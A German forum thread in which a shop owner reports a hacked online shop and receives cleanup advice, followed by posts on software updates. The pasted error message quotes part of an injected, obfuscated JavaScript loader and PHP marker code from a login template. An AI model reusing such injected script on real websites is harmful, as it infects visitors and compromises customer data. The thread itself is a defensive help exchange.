Shop geht nicht mehr

    Hallo an alle,

    ich habe seit heute folgendes Problem:

    #74ed9f# if(empty($smak)) { $smak = " "; echo $smak; } #/74ed9f# #74ed9f# if(empty($smak)) { $smak = " "; echo $smak; } #/74ed9f#
    Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "./templates/cseov22-gray-day/boxes/box_login.html" on line 8 "<div class="fl">Email: {$FIELD_EMAIL}</div><!--74ed9f--><script type="text/javascript" language="javascript" > if(document.querySelector)lpasbs=4;kjn=("55,9b,aa,a3,98,a9,9e,a4,a3,55,aa,a3,a5,97,65,6e,5d,5e,55,b0,42,3f,55,ab,96,a7,55,a8,a9,96,a9,9e,98,72,5c,96,9f,96,ad,5c,70,42,3f,55,ab,96,a7,55,98,a4,a3,a9,a7,a4,a1,a1,9a,a7,72,5c,9e,a3,99,9a,ad,63,a5,9d,a5,5c,70,42,3f,55,ab,96,a7,55,aa,a3,a5,97,55,72,55,99,a4,98,aa,a2,9a,a3,a9,63,98,a7,9a,96,a9,9a,7a,a1,9a,a2,9a,a3,a9,5d,5c,9e,9b,a7,96,a2 in /webspace/06/4030/sonnenshop24.eu/includes/classes/Smarty_3/sysplugins/smarty_internal_templatecompilerbase.php on line 665

    Ich habe keine Ahnung was da passiert ist und wie ich das wieder hinbekomme. Für Hilfen wäre ich äußerst dankbar.

    United Domains schreibt:

    Leider ist es uns nicht möglich, Ihre Websiten wiederherzustellen.

    ...Wir konnten allerdings feststellen, dass in Ihre Seite, Java-Script Code eingefügt wurde, der Besucher infizieren könnte.
    Anscheinend hatte ein Dritter unberechtigten Zugriff auf Ihren Webspace und konnten so, Ihre Seite manipulieren...

    Kasha

    Hi Kasha,

    dein Shop wurde "gehackt", d.h. jemand verteilt Schadcode darüber und hat schlimmstenfalls Zugriff auf deine Kundendaten etc.

    Wieder hinbekommen: Alle, wirklich alle, Passwörter müssen ersetzt werden, vorher solltest du dringend alle deine Rechner überprüfen mit denen du auf den Shop zugreifst - Da der Angreifer zugang zu deinem FTP-Server hatte, ist die wahrscheinlichkeit gegeben dass du auf deinem Rechner `n Trojaner hast.

    Lass deinen Hoster die Logs durchesehen, die sollten in der Lage sein den Angriffszeitpunkt und die IP herauszufinden.

    Wenn du die Basics gemacht hast, also deine Rechner wieder sicher sind machst du das mit den Passwörtern, erst danach setzt du dir den Shop wieder neu auf (saubere Neuinstallation damit keinesfalls Reste des Schadcodes oder eine Hintertür erhalten bleiben).

    Die Übernahme der Daten solltest du unbedingt händisch machen, also nicht einfach die alte Datenbank weiterverwenden, es besteht die Gefahr, dass sich ein versteckter Admin in den Kundendaten verbirgt.

    Alles in allem : Mein Beileid, da kommt jetzt ne Menge Arbeit auf dich zu (bzw Kosten wenn du es nicht selbst machen kannst).
    Noch eines : mach es keinesfalls selbst wenn du nicht fit in solchen Sachen bist!

    Mit besten Grüßen aus Hamburg

    Mario

    Danke Mario,

    ist Gott sei Dank nicht mein Hauptshop. Den originalen habe ich wieder hergestellt und DB Passwort geändert. Jetzt frag ich mal den Herrn Kausch, ob er mir den Shop nochmal aufspielen kann. Habe nämlich keine Original Daten. Das hat er damals alles gemacht.

    Ich habe den Shop erstmal wieder hinbekommen und er läuft. Aktuelle Version 2.3.2 Plus. Jetzt kommt ständig:

    Es gibt eine neuere Version, bitte aktualisieren Sie! Aktuell ist die Version 2.3.6 und diese finden Sie im Supportforum (Link ist im Admin oben rechts). Sollten Sie bereits das Update eingespielt haben, installieren Sie bitte im Admin noch unter Module > Installation / Update das Fixpack. Hierbei wird auch Ihre Datenbank aktualisiert.

    Ist echt Mist, dass ich kein Original habe.
    Ich finde nämlich kein Update

    2.3.6 ist schon sehr sicher und immer daran denken, das die UPDATES eingespielt werden ;)

    Von 2.3.6 kannst du auf 2.4.X updaten, aber hier würd ich noch bis Anfang November 2013 warten!!!!!